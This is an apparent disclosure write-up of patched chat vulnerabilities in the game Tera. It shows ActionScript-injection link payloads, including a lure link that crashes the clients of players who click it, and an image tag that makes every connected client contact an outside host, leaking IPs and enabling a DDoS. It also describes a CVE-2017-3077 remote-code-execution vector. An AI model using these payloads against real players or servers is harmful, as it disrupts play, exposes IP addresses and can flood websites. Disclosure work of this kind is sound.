Tera
Chat exploits, PDF version



Tera chat exploit



Author:
Yukikoo & Wuaw
image

Introduction

All the vulnerabilities in this documents have been found, reported to the game publisher, and fixed in LIVE environment some months ago. The game UI is build using Scaleform and action-script 2, with a old version of flash player inside. An important information for the chat: it support a subset of html, and support some custom tag and functionalities.

Basis of the exploit

The flash binary of a still vulnerable chat UI file can be found here https://github.com/neowutran/S1UI_chat2/blob/cd09d9dd2ddaab50a1b7cd73fda3bcb8b0e7d34d/S1UI_chat2.asm. In this document, I will explain how to exploit 2 html tag, the link tag ‘A’ and the image tag ‘img’.

Example of a link you can receive normally in-game

<a href='asfunction:chatNameAction,Yukikoo@0@0'>Yukikoo</a>

The content of the ‘href’ is interpreted and executed, It call the function ‘chatNameAction’ with the parameters ‘Yukikoo,0,0’.

Image tag

Example of a picture

<img src='img://abonormality__950165' width='64' height='64' vspace='-7' />

The content of the ‘src’ is interpreted and executed. ‘img://’ will call the libpng library.

Link tag exploit: Action-script injection and DOS

Introduction

In this section, exploits related to the link tag only. The target need to click on it to activate the payload.

Example

With this example, it will generate a link named ‘Add a tab in the chat’ that add a new tab in the chat of the person who click on the link. Link can be sent between players.

<a href='FSCommand:ToGame_Chat_RequestAddTab'>Add a tab in the chat</a>

With this new example, instead of calling some predefined function, we call directly the ‘root’ variable, and select the function we want. The effect of this link is pretty obvious.

<A HREF="asfunction:_root.OnGameEvent,OnGame_ResetUIPosition">Hi</A>

One of my favorite link is this one: We call the ‘loadMovie’ function, with a picture on the network. The flash file have been flagged to not use the network, so the network call fail, and the game client is killed.

<A HREF="asfunction:_root.loadMovie,
http://www.google.fr/images/branding/googleg/1x/googleg_standard_color_128dp.png"
>Get 200x Masterwork Alkahest</A>

So anyone clicking on this link is disconnected from the server.

Image tag exploit: DOS and Remote code execution

Introduction

The flash file have been tagged to not use the network (flash header). But it doesn’t impact the library used by flash. This time, we speak about the libpng library used by flash.

In this example, the game client will call the flash internals (with libpng library), download and display the picture. You can send this tag on the global chat, every player connected to the server will automatically download the picture (and give their IP) without even needing to click on a link like the previous exploit.

Limited exploit

<img src="img://__http://diclah.com/~yukikoo/toto.png" />

This have multiple consequence:

On a more hypothetical case (And I don’t think anyone used it) it could have been used to DDOS website: A lot of player are connected to the server, 1 link like that will generate thousands simultaneous connections on a given web resource. So if someone send hundred or thousand image tag like that, it would generated a lot of traffic.

CVE-2017-3077

The chat system is also vulnerable to CVE-2017-3077.

This CVE can be used to make everyone connected to the server crash. But a way bigger impact is: it’s possible to do a Remote Code Execution on everyone running the game. The payload can be broadcasted to everyone connected to the server with the chat function ‘megaphone’, but also using the others chat channels. On some region, the game is executed as Administrator, so the impact of this CVE is even greater.

References

Some interesting link can be found here: